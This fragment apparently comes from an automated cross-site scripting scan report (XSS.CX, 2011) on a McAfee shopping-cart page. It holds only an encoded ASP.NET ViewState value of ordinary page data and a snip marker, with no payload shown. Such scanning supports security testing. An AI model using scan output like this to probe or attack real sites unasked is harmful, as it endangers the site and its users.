value="/wEPDwUJNDAxNDE4NDc1D2QWAmYPZBYCAgEPFgYeA2RpcgUDbHRyHgRsYW5nBQJlbh4IeG1sOmxhbmcFAmVuFgQCAQ9kFgICBA8WAh4EVGV4dAW0AzxsaW5rIHJlbD0nc3R5bGVzaGVldCcgaHJlZj0nL1VJRGVzaWduL0xlZ2FjeVNpdGUvU3R5bGVzL2RlZmF1bHQuY3NzJyB0eXBlPSd0ZXh0L2NzcycgbWVkaWE9J3NjcmVlbicgLz4NCjxsaW5rIHJlbD0nc3R5bGVzaGVldCcgaHJlZj0nL1VJRGVzaWduL0xlZ2FjeVNpdGUvU3R5bGVzL1BHU3R5bGVzL3BmbG93U3RhbmRhcmQuY3NzJyB0eXBlPSd0ZXh0L2NzcycgbWVkaWE9J3NjcmVlbicgLz4NCjxsaW5rIHJlbD0nc3R5bGVzaGVldCcgaHJlZj0nL1VJRGVzaWduL0xlZ2FjeVNpdGUvU3R5bGVzL2VuLVVTL2N1bHR1cmUuY3NzJyB0eXBlPSd0ZXh0L2NzcycgbWVkaWE9J3NjcmVlbicgLz4NCjxsaW5rIHJlbD0nc3R5bGVzaGVldCcgaHJlZj0nL1VJRGVzaWduL0xlZ2FjeVNpdGUvU3R5bGVzL1ByaW50LmNzcycgdHlwZT0ndGV4dC9jc3MnIG1lZGlhPSdwcmludCcgLz5kAgMPFgIeBmFjdGlvbgUNL3NlY3VyZS9jYXJ0LxYOAgEPD2QWAh4FU3R5bGUFDmRpc3BsYXk6YmxvY2s7ZAIHD2QWCGYPZBYCZg9kFggCAQ9kFgRmDw8WAh4LTmF2aWdhdGVVcmwFGWh0dHA6Ly93d3cubWNhZmVlLmNvbS9VUy9kZAICDw8WBB4ISW1hZ2VVcmwFQ2h0dHBzOi8vc2VjdXJlaW1hZ2VzLm1jYWZlZS5jb20vY29tbW9uL21lZGlhL2ltYWdlcy9oZWFkZXIvbG9nby5naWYeB1Zpc2libGVoZGQCAw9kFgJmDw8WAh8GBUNodHRwczovL3d3dy5tY2FmZWVzZWN1cmUuY29tL1JhdGluZ1ZlcmlmeT9yZWY9dXMubWNhZmVlLmNvbSZsYW5nPUVOZBYCZg8PFgQfBwU/aHR0cHM6Ly9pbWFnZXMuc2NhbmFsZXJ0LmNvbS9tZXRlci91cy5tY2FmZWUuY29tLzMxLmdpZj9sYW5nPUVOHgdUb29sVGlwBXdNY0FmZWUgU2VjdXJlIHNpdGVzIGhlbHAga2VlcCB5b3Ugc2FmZSBmcm9tIGlkZW50aXR5IHRoZWZ0LCBjcmVkaXQgY2FyZCBmcmF1ZCwgc3B5d2FyZSwgc3BhbSwgdmlydXNlcyBhbmQgb25saW5lIHNjYW1zLhYCHg1vbmNvbnRleHRtZW51BWRqYXZhc2NyaXB0OmFsZXJ0KCJDb3B5aW5nIFByb2hpYml0ZWQgYnkgTGF3IC0gTWNBZmVlIFNFQ1VSRSBpcyBhIFRyYWRlbWFyayBvZiBNY0FmZWUiKTtyZXR1cm4gZmFsc2U7ZAIFD2QWCAIDD2QWBGYPFgIeCEN1c3RvbVVMBQVFTi1VU2QCAg8WAh8LBQVFTi1VU2QCBQ9kFgJmDw8WBB8DBRk8c3Bhbj5BYm91dCBNY0FmZWU8L3NwYW4+HwkFDEFib3V0IE1jQWZlZWRkAgcPZBYCZg8PFgQfAwUXPHNwYW4+Q29udGFjdCBVczwvc3Bhbj4fCQUKQ29udGFjdCBVc2RkAgkPZBYEZg8PFgQfAwUGU2VhcmNoHwkFBlNlYXJjaGRkAgIPD2QWAh4Jb25rZXlkb3duBbgBaWYgKChldmVudC53aGljaCA9PSAxMykgfHwgKGV2ZW50LmtleUNvZGUgPT0gMTMpKSB7ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2N0bDAwX21fSGVhZGVyRnVsbE5hdmlnYXRpb25fdWNNYXN0ZXJOYXZpZ2F0aW9uX3VjSGVhZGVyVXRpbGl0eU5hdl9TZWFyY2hfYnRuU2VhcmNoJykuY2xpY2soKTtyZXR1cm4gZmFsc2U7fWQCBw9kFgRmDxYCHwhoZAICD2QWAmYPDxYCHwhoZGQCAQ8PFgIfCGhkZAIDD2QWCgIBDw8WBB8DBRU8c3Bhbj5Qcm9kdWN0czwvc3Bhbj4fCQUIUHJvZHVjdHNkZAIDDw8WBB8DBR48c3Bhbj5WaXJ1cyBJbmZvcm1hdGlvbjwvc3Bhbj4fCQURVmlydXMgSW5mb3JtYXRpb25kZAIFD2QWAmYPDxYEHwMFHDxzcGFuPlNlY3VyaXR5IEFkdmljZTwvc3Bhbj4fCQUPU2VjdXJpdHkgQWR2aWNlZGQCBw8PFgQfAwUUPHNwYW4+U3VwcG9ydDwvc3Bhbj4fCQUHU3VwcG9ydGRkAgkPDxYEHwMFFjxzcGFuPkRvd25sb2Fkczwvc3Bhbj4fCQUJRG93bmxvYWRzZGQCBA9kFggCAQ8PFgIfCGhkZAIDD2QWAmYPDxYGHwMFCk15IEFjY291bnQfBgUqaHR0cDovL2hvbWUubWNhZmVlLmNvbS9yb290L015QWNjb3VudC5hc3B4HwkFCk15IEFjY291bnRkZAIFD2QWAmYPDxYCHwYFJGh0dHBzOi8vaG9tZS5tY2FmZWUuY29tL3NlY3VyZS9jYXJ0L2QWAmYPDxYCHg1BbHRlcm5hdGVUZXh0BQRDYXJ0FgIeBXRpdGxlBQRDYXJ0ZAIHD2QWAmYPDxYGHwMFBkxvZyBJbh8GBTNodHRwczovL2hvbWUubWNhZmVlLmNvbS9TZWN1cmUvUHJvdGVjdGVkL0xvZ2luLmFzcHgfCQUGTG9nIEluZGQCCQ9kFgJmD2QWBAIBD2QWBGYPDxYCHwYFGWh0dHA6Ly93d3cubWNhZmVlLmNvbS9VUy9kZAICDw8WBB8HBUNodHRwczovL3NlY3VyZWltYWdlcy5tY2FmZWUuY29tL2NvbW1vbi9tZWRpYS9pbWFnZXMvaGVhZGVyL2xvZ28uZ2lmHwhoZGQCAw9kFgJmDw8WAh8GBUNodHRwczovL3d3dy5tY2FmZWVzZWN1cmUuY29tL1JhdGluZ1ZlcmlmeT9yZWY9dXMubWNhZmVlLmNvbSZsYW5nPUVOZBYCZg8PFgQfBwU/aHR0cHM6Ly9pbWFnZXMuc2NhbmFsZXJ0LmNvbS9tZXRlci91cy5tY2FmZWUuY29tLzMxLmdpZj9sYW5nPUVOHwkFd01jQWZlZSBTZWN1cmUgc2l0ZXMgaGVscCBrZWVwIHlvdSBzYWZlIGZyb20gaWRlbnRpdHkgdGhlZnQsIGNyZWRpdCBjYXJkIGZyYXVkLCBzcHl3YXJlLCBzcGFtLCB2aXJ1c2VzIGFuZCBvbmxpbmUgc2NhbXMuFgIfCgVkamF2YXNjcmlwdDphbGVydCgiQ29weWluZyBQcm9oaWJpdGVkIGJ5IExhdyAtIE1jQWZlZSBTRUNVUkUgaXMgYSBUcmFkZW1hcmsgb2YgTWNBZmVlIik7cmV0dXJuIGZhbHNlO2QCCw9kFgYCAg9kFgRmDw8WAh8IZ2QWBGYQPCsACgBkZAICD2QWAgIBDxYCHwMFC1NlY3VyZSBQYWdlZAICD2QWBGYQPCsACgBkZAICD2QWAgIBDxYCHwMFC1NlY3VyZSBQYWdlZAIDD2QWBGYQPCsACgBkZAICD2QWAgIBDxYCHwMFC1NlY3VyZSBQYWdlZAIFD2QWBAIDEDwrAAoAZGQCBA9kFgICAQ8WAh8DBQtTZWN1cmUgUGFnZWQCDw9kFgYCAQ9kFgRmDw8WAh8DBQpXZSBhY2NlcHQ6ZGQCAQ8WAh4Dc3JjBU5odHRwczovL3NlY3VyZWltYWdlcy5tY2FmZWUuY29tL2xlZ2FjeS9ob21lL3BheW1lbnRJY29ucy9wYXltZW50SWNvbnNFTi1VUy5naWZkAgMPDxYCHwNlZGQCBQ8PFgIfAwU8Q29weXJpZ2h0ICZjb3B5OyAyMDAzLTIwMTAgTWNBZmVlLCBJbmMuIEFsbCBSaWdodHMgUmVzZXJ2ZWQuZGQCEQ9kFghmDxYCHwNlZAIDDxYCHwMF/AE8bWV0YSBuYW1lPSdXVC5tY19pZCcgIGNvbnRlbnQ9JzAnIC8+DQo8bWV0YSBuYW1lPSdXVC5tY19ldicgIGNvbnRlbnQ9J2NsaWNrJyAvPg0KPG1ldGEgbmFtZT0nV1Quel9jb3VudHJ5JyBjb250ZW50PSdFTi1VUycgLz4NCjxtZXRhIG5hbWU9J1dULnpfcmVmJyAgY29udGVudD0nT3RoZXInIC8+DQo8bWV0YSBuYW1lPSdXVC56X2NpZDEnICAgIGNvbnRlbnQ9JzAnIC8+DQo8bWV0YSBuYW1lPSdXVC56X2NpZDInIGNvbnRlbnQ9JzAnIC8+DQpkAgQPFgIfAwUzPG1ldGEgbmFtZT0nV1Quc2lfbicgIGNvbnRlbnQ9J1Nob3BwaW5nQ2FydEhvbWUnIC8+ZAIFDxYCHwMFnAE8bWV0YSBuYW1lPSdXVC50eF9lJyBjb250ZW50PSdhJyAvPjxtZXRhIG5hbWU9J1dULnNpX3gnIGNvbnRlbnQ9JzEnIC8+PG1ldGEgbmFtZT0nV1QucG5fc2t1JyBjb250ZW50PScyNzU7MzI4OzEzMCcgLz48bWV0YSBuYW1lPSdXVC50eF91JyBjb250ZW50PScxOzE7MScgLz5kAhUPZBYCZg9kFgJmD2QWAgIDDw8WAh8IaGRkGAwFWmN0bDAwJE1haW5Db250ZW50JG1fQmFza2V0JG1fQW1iaWdvdXNQb3B1cCRtX1JlbmV3U3Vic2NyaXB0aW9uQW1iaWd1b3VzJG1fYW1iaWdvdXNGb3JtVmlldw9nZAUtY3RsMDAkTWFpbkNvbnRlbnQkbV9SZWNlaXB0JG1fUmVjZWlwdEZvcm1WaWV3D2dkBTFjdGwwMCRNYWluQ29udGVudCRtX0NhcnRCaWxsaW5nJG1fQmlsbGluZ0Zvcm1WaWV3D2dkBV9jdGwwMCRNYWluQ29udGVudCRtX0NhcnRCaWxsaW5nJG1fQW1iaWdvdXNQb3B1cCRtX1JlbmV3U3Vic2NyaXB0aW9uQW1iaWd1b3VzJG1fYW1iaWdvdXNGb3JtVmlldw9nZAVLY3RsMDAkTWFpbkNvbnRlbnQkbV9CaWxsaW5nJG1fQmlsbGluZ0NvbnRhaW5lclVzZXJDb250cm9sJG1fQmlsbGluZ0Zvcm1WaWV3D2dkBV9jdGwwMCRNYWluQ29udGVudCRtX0NhcnRCaWxsaW5nJG1fQW1iaWdvdXNQb3B1cCRtX1JlbmV3T3JBZGRMaWNlbnNlQW1iaWd1b3VzJG1fYW1iaWdvdXNGb3JtVmlldw9nZAVaY3RsMDAkTWFpbkNvbnRlbnQkbV9CYXNrZXQkbV9BbWJpZ291c1BvcHVwJG1fUmVuZXdPckFkZExpY2Vuc2VBbWJpZ3VvdXMkbV9hbWJpZ291c0Zvcm1WaWV3D2dkBVxjdGwwMCRNYWluQ29udGVudCRtX0NhcnRCaWxsaW5nJG1fQW1iaWdvdXNQb3B1cCRtX01MU3Vic2NyaXB0aW9uQW1iaWd1b3VzJG1fYW1iaWdvdXNGb3JtVmlldw9nZAVXY3RsMDAkTWFpbkNvbnRlbnQkbV9CYXNrZXQkbV9BbWJpZ291c1BvcHVwJG1fTUxTdWJzY3JpcHRpb25BbWJpZ3VvdXMkbV9hbWJpZ291c0Zvcm1WaWV3D2dkBTdjdGwwMCRNYWluQ29udGVudCRtX0NvbmZpcm1PcmRlciRtX0NvbmZpcm1PcmRlckZvcm1WaWV3D2dkBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgVJY3RsMDAkTWFpbkNvbnRlbnQkbV9CYXNrZXQkbV9JdGVtTGlzdCRpdGVtXzIyODUkbV9sZWFybk1vcmUkbV9DbG9zZUJ1dHRvbgU0Y3RsMDAkTWFpbkNvbnRlbnQkbV9CYXNrZXQkbV9TYWxlc1BvcHVwJG1fQ2xvc2VQb3B1cAVNY3RsMDAkTWFpbkNvbnRlbnQkbV9CaWxsaW5nJG1fSnBCaWxsaW5nQ29udGFpbmVyVXNlckNvbnRyb2wkbV9CaWxsaW5nRm9ybVZpZXcPZ2Q=" />
...[SNIP]...
Report generated by XSS.CX at Sun Apr 17 13:23:31 CDT 2011.